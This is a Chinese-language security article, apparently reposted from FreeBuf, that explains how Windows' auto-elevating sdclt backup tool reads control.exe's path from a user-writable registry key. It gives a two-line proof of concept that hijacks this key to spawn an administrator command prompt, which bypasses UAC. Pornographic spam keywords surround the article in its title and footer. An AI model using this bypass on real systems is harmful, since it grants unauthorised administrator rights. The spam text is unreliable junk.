成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

如何利用sdclt磁盤備份工具繞過UAC

安全 數據安全
本文將詳細講解如何利用sdclt磁盤備份工具繞過UAC。

簡介

sdclt 是微軟提供的命令行磁盤備份工具,從 Vista 時代引入

從 Vista 時代引入

在 Windows 10 開始,sdclt 加入了自動提升權限的能力,requestedExecutionLevel 由 asInvoker 變為 requireAdministrator

(命令 sigcheck -m %systemroot%\\system32\\sdclt.exe 的結果)

(命令 sigcheck -m %systemroot%\system32\sdclt.exe 的結果)

當不帶任何參數啟動 sdclt 時,sdclt 會打開控制面板

sdclt 會打開控制面板

控制面板的主程序為 control.exe,那么 sdclt 是如何找到 control.exe 完整路徑的呢?

通過 process monitor 的分析 (過濾掉不相干進程,再用 CTRL + F 搜索 control.exe),sdclt 似乎是從注冊表讀取到了 control.exe 的路徑,

按照這個原理,我們寫一個簡單的 PoC 測試下

  1. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /t REG_SZ /d %COMSPEC% /f 
  2. sdclt 

在 cmd 中執行一下試試

在 cmd 中執行一下試試

可以看到,控制面板沒有啟動,而是彈出了一個 cmd,我們也獲得了管理員權限

當然,提升權限后還要清理下痕跡,具體代碼請看完整PoC,點這里下載

寫在***

其實可以把 HKCU 整個導出來看一下,目前我還沒有發現其它類似的案例,有興趣的同學可以研究下~

責任編輯:趙寧寧 來源: FreeBuf
相關推薦

2015-10-12 11:37:07

2018-11-13 12:56:57

2017-05-05 12:23:25

2018-04-04 14:52:04

2010-11-29 14:05:29

2015-10-30 14:11:47

2017-09-15 08:22:17

磁盤備份設備

2009-10-21 13:39:08

UACWindows 7微軟

2021-08-11 09:32:18

云備份勒索軟件網絡攻擊

2017-05-10 07:00:20

磁盤分區dcfldd工具備份分區

2024-10-16 16:36:22

2021-05-26 14:36:21

漏洞蘋果惡意軟件

2011-03-04 14:39:03

MySQL數據庫mysqldump

2009-05-12 09:03:30

微軟Windows 7操作系統

2023-12-26 12:09:32

2022-05-30 11:21:25

數據庫MySQL工具

2016-02-15 10:18:11

2016-03-29 10:08:07

2023-03-13 22:23:30

2017-09-07 15:39:27

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 亚洲一区视频在线 | 欧美色视频免费 | 精品日韩在线 | 精品综合网 | 成人在线免费网站 | 国产成人精品一区二区三区在线观看 | 欧美一区二区三区在线播放 | 在线视频成人 | 国产精品亚洲第一区在线暖暖韩国 | 懂色av蜜桃av | 91人人视频在线观看 | 九九热在线免费视频 | 黄色片视频网站 | 国产成人精品免费视频大全最热 | 国产传媒毛片精品视频第一次 | 无码一区二区三区视频 | 国产精品自拍视频网站 | 夜夜操av| 日韩一区二区在线视频 | 国产午夜精品一区二区三区四区 | 中文字幕亚洲精品 | 国产人成精品一区二区三 | 国产成人精品福利 | 久久99精品久久久97夜夜嗨 | 91原创视频| 国产高清一区 | 中文字幕日韩欧美一区二区三区 | 国产欧美日韩综合精品一区二区 | 成人一区二区三区 | 国产精品久久久久久久久久久新郎 | 91久久精品一区二区二区 | 久久精品国产v日韩v亚洲 | 亚洲三级免费看 | 黄色一级视频免费 | 91久久久久久久久久久久久 | 国产精品完整版 | 中日韩毛片 | 99re在线视频| 国产一区2区| 欧美日韩亚洲系列 | 91 在线|